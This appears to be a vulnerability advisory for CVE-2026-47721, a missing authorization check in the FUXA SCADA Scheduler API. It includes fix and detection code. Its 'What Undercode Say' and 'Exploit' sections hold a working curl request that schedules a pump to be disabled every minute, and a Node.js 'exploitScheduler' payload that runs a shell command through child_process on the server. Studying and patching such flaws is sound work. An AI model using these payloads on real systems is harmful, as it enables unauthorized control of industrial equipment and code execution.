How the CVE Works
CVE-2026-47721 is an authorization bypass in the FUXA Scheduler API that lets authenticated non-admin users create or modify scheduled actions that should be restricted to administrators.
The vulnerability exists because the Scheduler API endpoints (POST /api/scheduler and DELETE /api/scheduler) did not enforce administrator‑level permission checks. When processing scheduler modifications, the API never verified that the requesting user held admin rights, for example via `authJwt.haveAdminPermission(permission)`, the check the other privileged write endpoints apply.
As a result, an authenticated user with a non‑administrative role (e.g., “operator”) could schedule privileged operations normally reserved for administrators: changing device values (e.g., writing to PLC tags) and executing server‑side scripts.
In a typical SCADA deployment, the ability to write to devices and run automation scripts is a high‑impact capability that can alter setpoints, open safety interlocks, or execute arbitrary code on the server. By exploiting this flaw, an attacker can create a scheduled job that, for example, rewrites a pump’s enable tag or runs a project script that traverses the device tree.
Because the action is scheduled, the attacker does not need to keep an active session. A repeating schedule also re‑applies the malicious change every cycle, even after an administrator manually reverts it.
The issue is classified as CWE‑862 (Missing Authorization) and carries a CVSS 3.1 score of 6.3 (Medium) with the vector AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L. The fix was released in version 1.3.2, where the developers added explicit admin permission checks to both the POST and DELETE handlers, bringing them in line with the other write endpoints that reach `runtime.devices.setTagValue` or `runtime.scriptsMgr.runScript`.
As a defence‑in‑depth measure, the scheduler service should also validate each `deviceActions` entry against the creator’s stored groups at execution time (e.g., reject any `onRunScript` action if the author is not an admin when the job fires).
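The following is an added example written for this page, not FUXA's own code. It models the missing check described above, the 1.3.2-style admin gate on the POST and DELETE handlers, and the execution-time re-validation of `deviceActions` recommended here and in the Protection section, using plain functions so it runs without Express or a JWT library. The admin sentinel value, the numeric groups mask, the `USERS` directory, the `PRIVILEGED_ACTIONS` set and the request/response shapes are assumptions for illustration, not FUXA's real data model.

```javascript
// Added example (editor's code, not FUXA's): the Scheduler API flaw and its
// fix modelled with plain functions. The admin sentinel, the numeric groups
// mask, the user directory and the request/response shapes are assumptions.

const ADMIN = -1; // assumed sentinel meaning "administrator" in the groups mask
const PRIVILEGED_ACTIONS = new Set(['setTagValue', 'runScript']);

// Assumed user directory; a real server takes groups from the verified JWT.
const USERS = {
  admin: { name: 'admin', groups: ADMIN },
  operator: { name: 'operator', groups: 1 },
};

// Modelled on authJwt.haveAdminPermission(permission): true only for admins.
function haveAdminPermission(user) {
  return Boolean(user) && user.groups === ADMIN;
}

function saveSchedule(store, req) {
  store.set(req.body.name, { ...req.body, createdBy: req.user.name });
  return { status: 200 };
}

// Vulnerable shape (1.3.1): any authenticated caller may write a schedule.
function postSchedulerVulnerable(store, req) {
  if (!req.user) return { status: 401 };
  return saveSchedule(store, req);
}

// Fixed shape (1.3.2): the admin check gates the write.
function postSchedulerFixed(store, req) {
  if (!req.user) return { status: 401 };
  if (!haveAdminPermission(req.user)) return { status: 403 };
  return saveSchedule(store, req);
}

// DELETE gets the same gate; removing a schedule is also an admin operation.
function deleteSchedulerFixed(store, req) {
  if (!req.user) return { status: 401 };
  if (!haveAdminPermission(req.user)) return { status: 403 };
  return { status: store.delete(req.body.name) ? 200 : 404 };
}

// Defence in depth: when the cron fires, re-check each deviceActions entry
// against the creator's current groups. A job written before the patch, or
// by an account demoted since, then cannot run privileged actions.
function runSchedule(store, users, name, runner) {
  const job = store.get(name);
  if (!job) return { ran: 0, rejected: 0 };
  const creator = users[job.createdBy];
  let ran = 0;
  let rejected = 0;
  for (const action of job.deviceActions || []) {
    if (PRIVILEGED_ACTIONS.has(action.type) && !haveAdminPermission(creator)) {
      rejected += 1; // log and skip; do not touch the device or run the script
      continue;
    }
    runner(action);
    ran += 1;
  }
  return { ran, rejected };
}

// Walk-through: the operator's request from the advisory against both
// handlers, then the stale job the vulnerable handler left behind.
function demo() {
  const req = {
    user: USERS.operator,
    body: {
      name: 'pump_off',
      enabled: true,
      cron: '* * * * *',
      deviceActions: [
        { type: 'setTagValue', deviceId: 'pump_device', tag: 'enable', value: false },
      ],
    },
  };
  const vulnerableStore = new Map();
  const fixedStore = new Map();
  const executed = [];
  return {
    vulnerableStatus: postSchedulerVulnerable(vulnerableStore, req).status, // 200
    fixedStatus: postSchedulerFixed(fixedStore, req).status, // 403
    deleteStatus: deleteSchedulerFixed(vulnerableStore, req).status, // 403
    staleJob: runSchedule(vulnerableStore, USERS, 'pump_off', (a) => executed.push(a)), // { ran: 0, rejected: 1 }
    executedCount: executed.length, // 0
  };
}

console.log(demo());
```

The execution-time check is what makes the patch hold against a job that was already written while the server was on 1.3.1: upgrading alone leaves such a job in the store, and only re-validating the creator's privileges when the cron fires prevents it from running.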
The vulnerability was discovered by aisafe.io.
DailyCVE Form
Platform: FUXA
Version: 1.3.1
Vulnerability: Missing Authorization
Severity: Medium (6.3)
Date: 2026‑06‑08
Prediction: 2026‑07‑01
What Undercode Say
Check whether the target FUXA instance is vulnerable to CVE-2026-47721. On a patched server a non‑admin JWT should be refused with 403; on 1.3.1 the schedule is accepted.

```bash
# Probe the Scheduler API with a non-admin token (the cron fires every minute)
curl -X POST http://target-fuxa/api/scheduler \
  -H "Authorization: Bearer <non-admin_jwt>" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "malicious_schedule",
    "enabled": true,
    "cron": "* * * * *",
    "deviceActions": [
      {
        "type": "setTagValue",
        "deviceId": "pump_device",
        "tag": "enable",
        "value": false
      }
    ]
  }'
```
```javascript
// Node.js snippet to test for the missing admin check
const axios = require('axios');

async function exploitScheduler(targetUrl, token) {
  const payload = {
    name: 'exploit_cron',
    enabled: true,
    cron: '*/5 * * * *', // every five minutes, so the job re-applies itself
    deviceActions: [
      {
        type: 'runScript',
        script: "require('child_process').exec('whoami > /tmp/pwned')"
      }
    ]
  };
  try {
    await axios.post(`${targetUrl}/api/scheduler`, payload, {
      headers: { Authorization: `Bearer ${token}` }
    });
    console.log('[+] Scheduled malicious job (admin privilege escalation)');
  } catch (err) {
    // A 403 from the server means the admin check is in place (patched)
    const status = err.response ? err.response.status : err.message;
    console.error(`[!] Exploit failed (${status}) – target may be patched`);
  }
}
```
Exploit
- Authenticate as a non‑admin user (e.g., operator) and obtain a valid JWT.
- Craft a JSON payload containing a scheduled action that changes a device value or runs a server‑side script.
- Send a `POST /api/scheduler` request with the payload and the non‑admin JWT. Because of the missing admin check, the scheduler accepts the request.
- Wait for the cron trigger – the scheduled action executes with full administrator privileges, altering industrial processes or executing arbitrary code.
- Persist the attack – if the schedule repeats, the malicious action reapplies automatically even after manual remediation.
Protection
- Upgrade FUXA to version 1.3.2 or later, which includes the required admin permission checks in the Scheduler API.
- Apply the fix manually if an immediate upgrade is not possible: add `authJwt.haveAdminPermission(permission)` to the `POST /api/scheduler` and `DELETE /api/scheduler` handlers (see server/api/scheduler/index.js:102-112).
- Implement additional validation in the scheduler service so that each `deviceActions` entry (especially `onRunScript`) is allowed only if the creator is an admin at execution time.
- Restrict network access to the Scheduler API endpoints to trusted IP addresses or VPN clients.
- Monitor logs for unusual scheduler creations or modifications by non‑admin users.
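The monitoring point above, as an added example that is not part of the original advisory or of FUXA: a detection pass over audit log lines that flags every POST or DELETE to /api/scheduler by a user outside the admin list. The log line format, the `user=`/`status=` field names and the `ADMIN_USERS` list are assumptions; the sample lines are constructed, not real FUXA output, so adapt `LINE_RE` to whatever your reverse proxy or FUXA logger actually emits.

```javascript
// Added example (editor's code, not FUXA's): detect scheduler writes by
// non-admin users in audit logs. Line format, field names and the admin
// list are assumptions; adapt LINE_RE to the format you actually collect.

const ADMIN_USERS = new Set(['admin']); // assumed authoritative admin list

// Constructed sample lines, not real FUXA output.
const SAMPLE_LOG = [
  '2026-06-08T10:00:01Z POST /api/scheduler user=admin status=200',
  '2026-06-08T10:00:05Z GET /api/scheduler user=operator status=200',
  '2026-06-08T10:01:12Z POST /api/scheduler user=operator status=200',
  '2026-06-08T10:01:40Z POST /api/device user=operator status=200',
  '2026-06-08T10:02:03Z DELETE /api/scheduler user=operator status=403',
  'garbage line that does not parse',
];

const LINE_RE = /^(\S+) (GET|POST|PUT|DELETE) (\S+) user=(\S+) status=(\d{3})$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ts: m[1], method: m[2], path: m[3], user: m[4], status: Number(m[5]) };
}

// Flags every POST/DELETE to /api/scheduler by a non-admin. A 2xx means the
// server accepted the write (unpatched); a 4xx is still worth an alert
// because it shows an account probing an endpoint it has no business using.
function findSchedulerWritesByNonAdmins(lines, adminUsers = ADMIN_USERS) {
  const alerts = [];
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev) continue; // unparseable line: skip, do not crash the pipeline
    if (!ev.path.startsWith('/api/scheduler')) continue;
    if (ev.method !== 'POST' && ev.method !== 'DELETE') continue;
    if (adminUsers.has(ev.user)) continue;
    alerts.push({
      ts: ev.ts,
      user: ev.user,
      method: ev.method,
      status: ev.status,
      severity: ev.status < 300 ? 'high' : 'medium', // accepted write vs. refused attempt
    });
  }
  return alerts;
}

console.log(findSchedulerWritesByNonAdmins(SAMPLE_LOG));
```

Reads (GET) by operators are normal and are ignored; the rule keys on write methods plus the caller's role, which is exactly the combination the missing check let through.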
Impact
- Privilege Escalation: A non‑admin user (e.g., operator) can execute actions reserved for administrators, such as writing to PLC tags or running server‑side scripts.
- Unauthorized Industrial Control: An attacker can alter device states (e.g., open safety interlocks, change pump enable tags) without proper authorization, potentially causing physical damage or process disruption.
- Persistence: Scheduled jobs repeat automatically, reapplying malicious changes even after an administrator reverts them.
- Stealth: The attack does not require an active session; the scheduled action can be set to fire at a later time, making it harder to trace back to the attacker.
- CVSS Score: 6.3 (Medium) – the vulnerability is remotely exploitable with low complexity and requires low privileges, resulting in limited confidentiality, integrity, and availability impact.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

